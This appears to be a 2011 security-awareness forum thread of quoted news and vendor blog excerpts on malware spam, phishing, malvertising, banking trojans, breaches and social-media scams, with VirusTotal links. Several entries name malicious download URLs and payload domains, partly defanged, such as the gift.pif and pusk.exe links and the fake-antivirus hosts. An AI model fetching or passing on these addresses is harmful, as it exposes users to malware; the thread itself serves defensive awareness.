Feb. 5, 2011 - "Nasdaq acknowledged Saturday it has been the victim of hackers and said it has notified customers about the problem. The statement by Nasdaq OMX Inc. came on the heels of a report in Saturday's Wall Street Journal that said unidentified hackers had repeatedly breached the company's computer network in the past year. In a written statement, the company said during its normal security screening, it discovered "malware" files installed on a part of its network called Directors Desk, a service designed to allow company boards to communicate by securely storing and sharing documents..."

- http://online.wsj.com/article/SB10001424052748704709304576124502351634690.html#printMode
Feb. 5, 2011


2011-02-08, 17:18

PDF exploit disguised...
- http://labs.m86security.com/2011/02/pdf-exploit-disguised-as-a-xerox-scanned-document/
February 7, 2011 - "Most office network printers and scanners have a feature that sends scanned documents over email. Cyber crooks however, have imitated email templates used by these devices for malicious purposes. This week we noticed a malicious spam email that purports to be a scanned document sent using a Xerox WorkCentre Pro scanner... Variations of subject lines were used like
“Scan from XER0X”,
“Scan from XER0X ZIP Office”,
“Scan from XER0X Center Office” or
“Scan from XER0X Center Office”
... the attachment is actually not a Xerox WorkCentre Pro scanned document but instead a PDF exploit file that utilizes old Adobe Acrobat Reader vulnerabilities ..."
(Screenshots available at the URL above.)

More malicious email - Virus Outbreak In Progress
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
February 08, 2011


2011-02-11, 17:57

Malware endemic...
- http://www.theregister.co.uk/2011/02/11/malware_endemic_survey/
11 February 2011 - "... European Union statistics agency EUROSTAT found that one third of PC users (31 per cent) had the pox even though the vast majority (84 per cent) were running security software (anti-virus, anti-spam, firewall) on their PCs. Of the survey's respondents, 3 per cent reported financial loss as a result of farming or phishing attacks, while a further 4 per cent reported privacy violations involving data sent online. Bulgaria (58 per cent) and Malta (50 per cent) top the list of most infected users. By comparison, Finland (20 per cent), Ireland (15 per cent) and Austria (14 per cent) did relatively well. Trojans (59.2 per cent) were the most common types of infected found on compromised PCs, followed by viruses (11.7 per cent). A separate study by antivirus firm Panda*, also published this week, tells a similar story. Half (50 per cent) of the computers scanned by Panda in January harboured malware...
* http://press.pandasecurity.com/news/in-january-50-percent-of-computers-worldwide-were-infected-with-some-type-of-computer-threat/

- http://www.theinquirer.net/inquirer/news/2025421/anti-virus-software-losing-battle-war
Feb 10 2011


2011-02-12, 13:44

SPAM - Imageshack Scam Alerts...
- http://krebsonsecurity.com/2011/02/imageshack-swaps-spam-pages-for-scam-alerts/
February 12, 2011 - "... Spammers have been promoting their rogue pharmacy sites via images uploaded to free image hosting service imageshack.com. In response, the company appears to have simply replaced those images with the following subtle warning:
- http://krebsonsecurity.com/wp-content/uploads/2011/02/imgshack.png ..."


2011-02-15, 01:31

Malware SPAM campaigns
- http://labs.m86security.com/2011/02/spammed-malware-ramps-up-again/
February 14, 2011 - "... over the last week, we have seen the return of two familiar-looking malware spam campaigns.
* Post Express: Package Available
* United Parcel Service: Notification
While these two campaigns have similar themes, the spam originates from different spambots and has quite different payloads. The Post Express variety originates from the Asprox spambot... The UPS themed spam originates from one of the Cutwail spambot variants... VirusTotal results for the sample* are not overly helpful, show widely varying names, including banking trojan, zbot, Bredolab and Oficla. Interestingly, when we pulled out some of strings from the malware sample, we saw that it did indeed have an interest in banking... another string we found in the malware body was “Program Files\Trusteer\Rapport\bin\RapportService.exe”. Trusteer Rapport is anti-fraud software which the SpyEye banking trojan toolkit specifically has an evasion option for. Not being content with just banking data, the bot also proceeded to download a number of different files, including Waledac and Cutwail spambots, plus it also threw in this fake anti-virus software for good measure... two lessons from this brief analysis. First, similar looking campaigns are not necessarily the same. Second, installer bots such as these can lead to a swathe of different malware on the infected host."
(Screenshots available at the m86 URL above.)
* http://www.virustotal.com/file-scan/report.html?id=23f95b4de9dda8731e991c1a86e01f82058a6dd79f0af7ae87228ee8d320fea3-1297477589
File name: USPS_Document.exe
Submission date: 2011-02-12 02:26:29 (UTC)
Result: 32/43 (74.4%)
- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d
February 14, 2011

- http://labs.m86security.com/2011/02/ups-spam-oh-wait-its-an-fdic-spam-campaign/
February 15, 2011 - "... the Cutwail botnet changed its spamming theme this week. The malicious spam pretends to be from the FDIC... the spammer did not manage to configure the spam template correctly and left the from field still using the domain ups.com..."
(Screenshots available at the URL above.)
- http://www.virustotal.com/file-scan/report.html?id=f0ba88d8ca25ff3d2c9014e50b50936c1a3247409c702de7a2729a3d2dc81458-1297829427
File name: 7529534f159bb49113908071a3061aa4
Submission date: 2011-02-16 04:10:27 (UTC)
Result: 26/43 (60.5%)


2011-02-16, 04:47

BBC - injected w/malicious iFrame
- http://community.websense.com/blogs/securitylabs/archive/2011/02/15/bbc6-website-injected-with-malicious-code.aspx
15 Feb 2011 - "The BBC - 6 Music Web site has been injected with a malicious iframe, as have areas of the BBC 1Xtra radio station Web site. At the time of writing this blog, the sites are still linking to an injected iframe... The injected iframe occurs at the foot of the BBC 6 Music Web page, and loads code from a Web site in the .co.cc TLD. The iFrame injected into the Radio 1Xtra Web page leads to the same malicious site. If an unprotected user browsed to the site they would be faced with drive-by downloads, meaning that simply browsing to the page is enough to get infected with a malicious executable. The payload is delivered to the end user only once, with the initial visit being logged by the malware authors. The code that is delivered to end users utilizes exploits delivered by the Phoenix exploit kit:
- http://community.websense.com/blogs/securitylabs/pages/phoenix-exploit-s-kit.aspx
A malicious binary is ultimately delivered to the end user. The VirusTotal detection* of this file is currently around 20%..."
* http://www.virustotal.com/file-scan/report.html?id=4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b31da6bc-1297784293
File name: 4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b[...].bin
Submission date: 2011-02-15 15:38:13 (UTC)
Result: 9/43 (20.9%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=4a0ab371e6c6dd54deeab41ab1b77fa373d2face149523dfd183d669b31da6bc-1298083200
File name: 3810631eeaea4950d0e1bd48ec89be12
Submission date: 2011-02-19 02:40:00 (UTC)
Result: 28/43 (65.1%)


2011-02-18, 00:45

Smitnyl - MBR infector...
- http://www.f-secure.com/weblog/archives/00002101.html
Feb. 17, 2011 - "... an MBR file system infector such as Trojan:W32/Smitnyl.A (98b349c7880eda46c63ae1061d2475181b2c9d7b), which appears to be distributed via some free file-sharing networks, seems worth a quick analysis, even if it only targets one portable executable system file and the infection is straightforward compared to common virus file infectors. Smitnyl.A first infects the MBR via raw disk access. Then it replaces it with a malicious MBR containing the file infector routine... MBR File System Infector... can bypass Windows File Protection (WFP). As WFP is running in protected mode, any WFP-protected file will be restored immediately if the file is replaced...
Userinit... is one of the processes launched automatically when the system starts, allowing the malware to execute automatically when the system starts.
Smitnyl infects Userinit from the first stage of the boot sequence. When the MBR is loaded to 0x7C00, it determines the active partition from the partition table and also the starting offset of boot sector. It then checks the machine’s file system type... Smitnyl will check for the Windows path from $ROOT down to the System32 directory, where userinit.exe is located... After decoding, it launches %temp%\explorer.exe using ShellExecute — this serves as a decoy to hide the infection. At the same time, it will execute the real explorer.exe using Winexec... there is nothing special about the final payload — it is merely a downloader. The infected userinit.exe disables 360safe's IE browser protection so that the downloader can retrieve files from the remote server http://[...].perfectexe.com/."
(More detail at the F-secure URL above.)

- http://www.urlvoid.com/scan/perfectexe.com
Detections: 8/19 (42%)


2011-02-18, 14:22

Social engineering to infect with malware ...
- http://www.securitypark.co.uk/security_article265838.html
18/02/2011 - "In the past weeks, new malicious codes that use Facebook to ensnare victims have been wreaking havoc. The recent trend for developing computer threats designed to spread by exploiting the most popular social media continues to gather pace. One of these, Asprox.N, is a Trojan that reaches potential victims via email. It deceives users by telling them that their Facebook account is being used to distribute spam and that, for their security, the login credentials have been changed. It includes a fake Word document supposedly containing the new password. The email attachment has an unusual Word icon, and is called Facebook_details.exe. This file is really the Trojan which, when run, downloads a .doc file that runs Word to make users think the original file has opened. The Trojan, when run, downloads another file designed to open all available ports, connecting to various mail service providers in an attempt to spam as many users as possible. The other, Lolbot.Q, is distributed across IM applications such as MSN and Yahoo!, displaying a message with a malicious link. This link downloads a worm designed to hijack Facebook accounts and prevent users from accessing them. If users then try to login to Facebook, a message appears informing that the account has been suspended and that to reactivate them they must complete a questionnaire, with the offer of prizes –including laptops, iPads, etc.– to encourage users to take part... PandaLabs advises all users to be wary of any messages with unusually eye-catching subjects, whether via email or IM or any other channel; and to be careful when clicking on external links in Web pages..."
- http://pandalabs.pandasecurity.com/

:mad: :mad:

2011-02-23, 21:00

Oddjob Trojan keeps banking sessions open after victims log out
- http://www.theregister.co.uk/2011/02/22/oddjob_banking_trojan/
February 22, 2011 - "... OddJob Trojan hijacks customers’ online banking sessions in real time using their session ID tokens. By keeping accounts open even after victims think they have quit, the malware creates a window for fraudsters to loot compromised accounts and commit fraud... Trusteer, the transaction security firm that discovered the malware, said it made the discovery a few months ago but is only able to report on it now following the conclusion of a police investigation. OddJob is being used by cyber-crooks based in Eastern Europe to attack their customers in several countries including the USA, Poland and Denmark... More information on the Oddjob Trojan can be found in a blog post by Trusteer here*."
* http://www.trusteer.com/blog/new-financial-trojan-keeps-online-banking-sessions-open-after-users-%E2%80%9Clogout%E2%80%9D


2011-02-25, 01:56

Facebook clickjacking malware - in Italian...
- http://nakedsecurity.sophos.com/2011/02/22/facebook-clickjacking-malware-italian-disguises/
February 22, 2011 - "Non-English speaking Facebook users shouldn't be fooled into believing that they are somehow immune from the scams and attacks that plague the social networking site. The latest few campaigns seen by SophosLabs, for instance, target Italian users of the social network... Colorful clickjacking attacks, requiring users to click on a series of rainbow-colored boxes without realizing they're authorizing other actions, are nothing new of course. As more and more criminals discover how successful attacks via Facebook can be, we can expect the tried-and-trusted techniques of the English-speaking world to be cloned elsewhere around the globe..."


2011-02-26, 17:05

Ransomware a successor of scareware?
- http://community.websense.com/blogs/securitylabs/archive/2011/02/24/the-ransomway.aspx
24 Feb 2011 - "... We dare to say it is not. Both malware groups try to convince the victim that there is no way to avoid paying money, although the approach is very different. With scareware the victims at least have a chance to resist the social engineering offering the only solution and work on the cleaning process on their own. With ransomware this chance hardly exists at all. Yes, there are many similarities and it is likely the same people stand behind both types of malware groups. However, in one case there is a "seller" offering the "products and services"; in the other one an extorter asking for ransom. Even though both are illegal and dishonest, the approach is different.
Restoration and Protection: Restoration of data or access depend on the kind of malware. In some cases it is possible to download a utility and clean the infected system, in other cases to replace malicious parts with clean ones. Unfortunately, there is no means to bypass malware such as Gpcode. Therefore the only protection is to keep up-to-date backups stored -off- the machine all the time..."
- http://www.youtube.com/watch?v=JZT0JZybfVc


2011-02-28, 17:37

UK - malvertising attack...
- http://www.theregister.co.uk/2011/02/28/tainted_ads_blight_uk_sites/
28 Feb. 2011 - "Several highly trafficked UK sites – including the website of the London Stock Exchange – served malware-tainted ads as the result of a breach of security by a third-party firm they shared in common. Surfers visiting auto-trading site Autotrader.co.uk and the cinema site Myvue.com were also exposed to the attack, which stemmed from a breach at their common ad provider, Unanimis, rather than at any of the three sites themselves. Unconfirmed reports suggest eBay.co.uk was also affected. The malicious ads made several concealed redirects before dropping surfers on a portal pimping rogue anti-virus (AKA scareware)... Websense** confirmed the attack on Monday, saying it had been tracking the progress of the attack over recent days..."
* http://www.highseverity.com/2011/02/london-stock-exchange-hit-by-malware.html

** http://community.websense.com/blogs/securitylabs/archive/2011/02/28/myvue-com-and-autotrader-co-uk-infected-with-malvertizing.aspx


2011-03-01, 12:26

Morgan Stanley security breach...
- http://www.bloomberg.com/news/2011-02-28/morgan-stanley-network-hacked-in-same-china-based-attacks-that-hit-google.html
2011-02-28 - "Morgan Stanley experienced a “very sensitive” break-in to its network by the same China-based hackers who attacked Google Inc.’s computers more than a year ago, according to leaked e-mails from a cyber-security company working for the bank. The e-mails from the Sacramento, California-based computer security firm HBGary Inc., which identify the first financial institution targeted in the series of attacks, said the bank considered details of the intrusion a closely guarded secret... The HBGary e-mails don’t indicate what information may have been stolen from Morgan Stanley’s databanks or which of the world’s largest merger adviser’s multinational operations were targeted... a spokeswoman for the New York-based bank, which unlike Google didn’t disclose the attacks publicly, declined to comment on them specifically... The hackers successfully implanted software designed to steal confidential files and internal communications, according to dozens of HBGary e-mails that detail efforts to plug the holes. One e-mail, dated June 19, said that the attackers may be the same ones who had hit a U.K.-based defense contractor and discusses hacking software called Monkif, which can be used by intruders to remotely orchestrate a sophisticated form of cyber attack known as an ‘advanced persistent threat’ or APT..."
- http://blog.damballa.com/?p=341


2011-03-01, 18:29

"You have received a gift..." of malware...
- http://blog.mxlab.eu/2011/03/01/you-have-received-a-gift-from-one-of-our-members-emails-lead-to-malware/
March 1, 2011 - "... new trojan distribution campaign by email with the subject “You have received a gift from one of our members !” The email is sent from the spoofed address “gifts@freeze.com”, while the SMTP from address is “_www@pictry.loc”... The URL in the email leads to hxxp:// www .i-tec .it/gift.pif and this malicious file is 844kB large... A Backdoor.IRCBot is installed allowing to open a backdoor to the infected computer, combined with Trojan.RunKeys that will make sure that trojans are started up when the computer boots... malware will make a connection with a remote IRC server..."
(Screenshots and more detail available at the MXLabs URL above.)

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d


2011-03-02, 15:21

Twitter survey SCAM...
- http://nakedsecurity.sophos.com/2011/03/02/11-6-hours-survey-scam-spreads-like-wildfire-on-twitter/
March 2, 2011 - "A rogue application has caught Twitter users off their guard today, with thousands of people duped into clicking on links believing that it will reveal how many hours they have spent on Twitter... However, if you click on the bit.ly link being used in the message you are taken to a page which attempts to connect a rogue application called "Time on Tweeter" with your Twitter account. The application instantly tweets a message to your Twitter feed, claiming that you have also spent 11.6 hours on Twitter... spreading the link virally, and then directs you to a page which presents a revenue-generating survey on behalf of the scammers. Affected users should revoke the application's access to their Twitter account immediately..."
(Screenshots available at the Sophos URL above.)


2011-03-07, 23:38
FYI... "SCAM of the Day" - it's almost that bad...

Facebook SCAMS prolific...
- http://nakedsecurity.sophos.com/?s=Facebook+scams&x=0&y=0
March 7, 2011, March 5, 2011, March 3, 2011, March 2, 2011, etc...


2011-03-08, 11:35

SWF embedded JavaScript
- http://blogs.technet.com/b/mmpc/archive/2011/03/07/embedded-javascript-in-swf.aspx
7 Mar 2011 - "... Since the beginning of this year, 89% of the targets were in South Korea with 75% of them specifically in Seoul. Here’s a chart with a breakdown by unique machines in the months January and February of this year (there has been no activity in March):
- http://www.microsoft.com/security/portal/blog-images/JASWI-0b.jpg
Attack attempts by unique machines in the months January and February of 2011
... The malware Trojan:SWF/Jaswi.A is unlike other SWF malware; other SWF malware typically calls “getURL <website address>” within an ACTION tag in order to visit a malicious website link without user consent... Trojan:SWF/Jaswi.A contains an embedded malicious JavaScript that initiates a legal Windows API call to trigger the payload... the legal function ExternalInterface.call() has been made to complete a procedure of initiating JavaScript injection... Internet Explorer vulnerability CVE-2010-0806 has been abused! This particular exploit affects Microsoft Internet Explorer versions 6, 6+SP1 and 7, and could allow a remote attacker to execute arbitrary code... The file “uusee.exe” from the obfuscated URL shown above is actually a prevalent password stealer in China... the embedded JavaScript technique used in the malicious SWF... appears to be a trend and may become a popular method..."


2011-03-08, 17:18

Malvertisements - a plague...
- http://threatpost.com/en_us/blogs/one-million-web-sites-infected-end-2010-030711
March 7, 2011 - "... The Dasient Q4 Malware Update* reported that more than one million Web sites were infected in the last quarter of 2010. That period saw a 25% growth in malicious advertisements from the previous quarter, as attackers found ways to sneak malicious code into widely used syndicated online ad networks. Its a trend that security experts see accelerating in 2011, as malicious advertisements, sometimes referred to as 'malvertisements,' crop up on high profile sites, said Neil Daswani, Chief Technology Officer at Dasient. Daswani said that, overall, his company saw a 100% increase in the amount of malicious advertising from the third- to fourth quarters, 2010. However, much of that was due to an expansion of the sites Dasient monitored, with an increasing focus on so-called 'remnant' ad networks, which aggregate 'remnant' advertisements from direct marketers, who often have little oversight about where the ads appear... In recent weeks, well-ranked sites such as Autotrader .co.uk, cinema site Myvue .com and londonstockexchange .com were reported to have served up malicious advertisements. Malicious ads are commonly used to display pop up messages with links that will take users to a drive by download Web site download rogue anti virus programs or other threats..."
* http://blog.dasient.com/2011/03/dasient-q4-malware-update-significant.html


2011-03-11, 21:05

Virut malware spreads with warez ..
- http://techblog.avira.com/2011/03/11/polymorphic-virut-malware/en/
March 11, 2011 - "W32/Virut.ce is one of the most widespread pieces of malware which can be found on infected computers. This file infector gets massively spread bundled with illegal software (warez). The virus is infecting executable files using latest techniques which make detecting and treating those files particularly difficult. On the current threat landscape we see more server-side polymorphic malware, infecting executable files is not as popular as a few years ago. During the last years emulation techniques have become better which makes detection of polymorphic malware much easier. The authors of the virus weren’t put off by the difficulties they faced in trying to infect executable files. But W32/Virut.ce is not only infecting executable files, the virus also includes a backdoor using the IRC protocol. This allows attackers to download and run further malware from the Internet which can (as example) steal information. The server to which the malware connects is a pre-defined IRC server, the channel is called “virtu”..."
- http://techblog.avira.com/wp-content/uploads/2011/03/Analysis_W32.Virut_.ce_.pdf
(PDF, 1 MB)


2011-03-15, 18:09

FTC advisory - charity SCAMS
- http://www.ftc.gov/opa/2011/03/earthquake.shtm
03/14/2011 - "After the earthquake that rocked Japan’s northeast coast and triggered a widespread tsunami last week, the Federal Trade Commission is urging consumers to be cautious of potential charity scams... carefully consider urgent appeals for aid that (are received) in person, by phone or mail, by e-mail, on websites, or on social networking sites. The agency’s Charity Checklist* advises consumers about donating wisely to charities..."
* http://www.ftc.gov/bcp/edu/pubs/consumer/alerts/alt114.shtm

- http://community.websense.com/blogs/securitylabs/archive/2011/03/15/cybercriminals-utilize-japanese-disaster.aspx
15 Mar 2011


2011-03-17, 04:46

Phish targets BoA, PayPal...
- http://www.theregister.co.uk/2011/03/17/phishers_outgun_firefox_chrome/
17th March 2011 - "... phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez*, the locally stored file opens a web form that collects the customers' login credentials, credit card numbers and other sensitive information and then uses a POST request to zap them to a PHP application on a legitimate website that's been compromised. By avoiding the use of more verbose GET requests and known phishing sites, the scam flies completely under the radar of the browsers' fraud protection features..."
* http://labs.m86security.com/2011/03/phishing-scam-in-an-html-attachment/
March 15th, 2011 - "... Phishers... have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser..."


2011-03-18, 13:12

Twitter SCAMS spreading fast
- http://nakedsecurity.sophos.com/2011/03/17/twitter-users-are-not-smarter-than-facebook-users-profile-views-scam-spreading-fast/
March 17, 2011 - "... Thousands of Twitter users are falling once again for a scam that requires victims to grant access to a malicious application. Today's scam seems to be a continuance of a trend in which the scammers are adapting their ego-driven bogus Facebook apps to operate on Twitter... If you accept the application, not only will it post to your Twitter feed, it will also display an image with a random number that supposedly represents the number of people who have viewed your profile. Not surprisingly, the revenue generating opportunity for these scammers is a fake IQ test that suggests you could win a free iPad*... The advice remains the same as for Facebook. Be cautious of which games/apps you approve and carefully audit the authorization page to see if an app wants control of your account or permission to post..."
* http://sophosnews.files.wordpress.com/2011/03/twitterantispam500.png?w=500&h=244


2011-03-18, 18:27

SPAM/phish continues...
- http://www.us-cert.gov/current/#ongoing_phishing_attack
March 18, 2011 - "... public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment. This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks, this method of attack is able to bypass this security mechanism..."

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d
March 18, 2011


2011-03-19, 04:48

Fake Facebook email - Zbot and Black Hole Exploit Kit "all in one"
- http://community.websense.com/blogs/securitylabs/archive/2011/03/18/zbot-and-blackhole-exploit-kit-all-in-facebook-comments-spam.aspx
18 Mar 2011 - "Websense... has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually be originating from the Cutwail/Pushdo spam bot. This time round, the Cyber criminals employ two attack vectors: social engineering and an exploit kit. Both end up with the Zeus/Zbot Trojan installed on the targeted machines... The malicious email is spoofed to appear to be coming from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as a formal Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection*... The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today - the Blackhole exploit kit. -Any- successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine..."
* http://www.virustotal.com/file-scan/report.html?id=81b65dd4f92fc29ba3f8062ed69fcb89a703e1c7d1ded2ff956aee11d5a2c0f1-1300384459
File name: facebook.update.utility.exe.1
Submission date: 2011-03-17 17:54:19 (UTC)
Current status: finished
Result: 3/43 (7.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=81b65dd4f92fc29ba3f8062ed69fcb89a703e1c7d1ded2ff956aee11d5a2c0f1-1300478516
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-18 20:01:56 (UTC)
Result: 14/41 (34.1%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=81b65dd4f92fc29ba3f8062ed69fcb89a703e1c7d1ded2ff956aee11d5a2c0f1-1300555240
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-19 17:20:40 (UTC)
Result: 18/41 (43.9%)


2011-03-21, 12:18

Tax Season - phishing scams, malware campaigns
- http://www.us-cert.gov/current/#us_tax_season_phishing_scams1
March 16, 2011 - "... These phishing scams and malware campaigns may include, but are not limited to, the following:
* information that refers to a tax refund
* warnings about unreported or under-reported income
* offers to assist in filing for a refund
* details about fake e-file websites
These messages which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code...
• Do not follow unsolicited web links in email messages.
• Maintain up-to-date antivirus software..."
- http://www.irs.gov/privacy/article/0,,id=179820,00.html?portlet=5

(More info and detail at both URL's above.)


2011-03-25, 19:30

Spotify users attacked by drive-by malware...
- http://news.netcraft.com/archives/2011/03/25/spotify-free-users-attacked-by-malware.html
25 March, 2011 - "Users of the Spotify Free music streaming software have been attacked by drive-by malware. At least one attack used a Java exploit to drop malicious executable code on a victim's computer, with AVG software identifying one of the malicious payloads as Trojan horse Generic_r.FZ. Another threat blocked by AVG was a Blackhole Exploit Kit hosted on the uev1 .co .cc domain. Several people have reported the problem to Spotify over the past 24 hours, and attacks are still being reported at the time of publication. It is believed that the attacks are being launched through malicious third-party adverts which are displayed in ad-supported versions of the Spotify software. By exploiting local software vulnerabilities, the attacker can then install malware on unprotected computers."

- http://community.websense.com/blogs/securitylabs/archive/2011/03/25/spotify-application-serves-malicious-ads.aspx
25 Mar 2011 - "... The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24... In this case the malicious ad is actually displayed inside of the Spotify application... The application will render the ad code and run it as if it were run inside a browser. This means that the Blackhole Exploit Kit works perfectly fine and it's enough that the ad is just displayed to you in Spotify to get infected, you don't even have to click on the ad itself. So if you had Spotify open but running in the background, listening to your favorite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all 3rd party ads in the free version while they did their investigation but the ads have now been turned back on again. Once the ad was displayed, the computer would connect to hxxp: //uev1 .co .cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains... One of the vulnerabilities the exploit kit uses is a vulnerability in Adobe Reader/Acrobat. The kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file*. Once the fake AV is launched it connects to the following domains to download additional content, including a rootkit** which is a packed version of TDSS:
• tuartma .in, rappour .in, findstiff .org, searchcruel .org, findclear .org, replity .in, searchgrubby .org, demivee .in, ripplig .in..."
(Screenshots and more detail available at the URL above.)
* http://www.virustotal.com/file-scan/report.html?id=a41b05120be3018082eff5d75811b166d1cf9dccb7c2ea3da3d42fd090c97acf-1301413767
File name: L9FPB1.pdf
Submission date: 2011-03-29 15:49:27 (UTC)
Result: 12/43 (27.9%)

** http://www.virustotal.com/file-scan/report.html?id=7bb753b1cdfd15bde7b321542be5d1708c931467ce80de3b8fbf8fb98370f261-1301086553
File name: spotify_dropped.exe
Submission date: 2011-03-25 20:55:53 (UTC)
Result: 4/43 (9.3%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=7bb753b1cdfd15bde7b321542be5d1708c931467ce80de3b8fbf8fb98370f261-1301408014
File name: f5dcd2415fa4b069c0b934baee109ea5
Submission date: 2011-03-29 14:13:34 (UTC)
Result: 21/41 (51.2%)


2011-04-05, 07:30

Twitter worm "Profile Spy"...
- http://www.theregister.co.uk/2011/04/05/twitter_worm/
5 April 2011 - "... a virally spreading worm that attempts to make money by scamming users into filling out surveys and viewing advertisements.
The rogue Twitter app is known as Profile Spy and gets installed by people who are tricked into believing it can tell them who has been viewing their online microposts. “Wow! See who viewed your twitter with Profile Spy,” the come-on reads. Those who click on the link are asked to allow the app to access and update their account data. Once they do so, they are presented with an unending series of popups for online surveys and ads promoting car insurance, long distance services and games, according to Errata Security CEO Rob Graham*, who blogged about the worm on Monday..."
* http://erratasec.blogspot.com/2011/04/anatomy-of-twitter-worm-profile-spy.html
April 04, 2011


2011-04-05, 19:27

SpyEye banking trojan - same as ZeuS...
- http://www.theregister.co.uk/2011/04/05/spyeye_mobile_trojan/
5 April 2011 - "Cybercrooks have deployed a sophisticated man-in-the-mobile attack using the SpyEye banking Trojan toolkit. The Trojan, which infects Windows machines, displays additional content on a targeted European bank's webpage that requests prospective marks to input their mobile phone number and the IMEI of the device. The bank customer is informed the information is needed so that a new "digital certificate" can be sent to the phone... More information on the SpyEye-based mobile banking Trojan attack can be found in a blog post by F-Secure here*."
* http://www.f-secure.com/weblog/archives/00002135.html
April 4, 2011


2011-04-06, 13:29

Symantec Internet Security Threat Report...
- http://www.symantec.com/about/news/release/article.jsp?prid=20110404_03
April 5, 2011 – "Symantec... today announced the findings of its Internet Security Threat Report, Volume 16, which shows a massive threat volume of more than 286 million new threats last year, accompanied by several new megatrends in the threat landscape...
> 2010: The Year of the Targeted Attack...
> Social Networks: Fertile Ground for Cybercriminals...
> Attack Toolkits Focus on Java...
> Mobile Threat Landscape Comes Into View...
> Key Facts and Figures:
• 286 million new threats...
• 93 percent increase in Web-based attacks...
• 260,000 identities exposed per breach...
• 14 new zero-day vulnerabilities...
• 6,253 new vulnerabilities...
• 42 percent more mobile vulnerabilities...
• One botnet with more than a million spambots - Rustock..."
(More detail available at the URL above.)


2011-04-10, 12:59

Facebook "video" SCAMS...
- http://community.websense.com/blogs/securitylabs/archive/2011/04/09/quot-the-hottest-amp-funniest-golf-course-video-quot-scam-on-facebook.aspx
9 Apr 2011 - "... scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video - LOL"... When clicking on the link you're taken to the following page, tricking you into not only liking the page but also sharing it with your friends. It's doing this by using standard Facebook APIs... After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam so in the end there's no video at all... As always, if a video forces you to like, share, or install an app to view it, DON'T..."


2011-04-13, 14:54

Virus Outbreak in Progress...
- http://www.ironport.com/toc/

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d
Malicious PDF Attachment E-mail Messages - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22911
Fake Photograph Link E-mail Messages - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22924
Fake Parcel Delivery Notification E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22696
Fake Facebook Personal Message E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=20961
Malicious United Postal Svc Delivery Failure E-mail - April 13, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22769

Fake Scanned Document E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21429
Fake Facebook Password Reset Notification E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22907
Fake Official Letter E-mail Messages - April 12, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22910
Fake UPS Shipment Arrival E-mail Messages - April 12, 2011 ...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22030


2011-04-14, 17:54

Spamvertised.. campaign serving scareware
- http://ddanchev.blogspot.com/2011/04/spamvertised-reqest-rejected-campaign.html
April 12, 2011 - "A currently spamvertised scareware-serving campaign is enticing end users into downloading and executing a malicious binary, which drops a scareware variant.
Sample subject: Reqest rejected (SP?)
Sample message: "Dear Sirs, Thank you for your letter! Unfortunately we can not confirm your request! More information attached in document below. Thank you Best regards."
Sample attachments: EX-38463.pdf.zip; EX-38463.pdf.exe
Detection rate:
- http://www.virustotal.com/file-scan/report.html?id=c03711dbafae9b296daed8720f997d84caa5e5a5407a689926050a061d67b932-1302746736
File name: EX-38463.pdf.exe
Submission date: 2011-04-14 02:05:36 (UTC)
Current status: finished
Result: 35/41 (85.4%)
... Upon execution downloads hdjfskh .net/ pusk .exe -
Detection rate:
- http://www.virustotal.com/file-scan/report.html?id=c912a975e3c2fc911d6550d86e8fd89dbd30e3d1e07d788b45aac0d6cf61e83c-1302681312
File name: VRB.EXE.Muestra EliStartPage v23.03
Submission date: 2011-04-13 07:55:12 (UTC)
Current status: finished
Result: 19/42 (45.2%)

Phones back..."

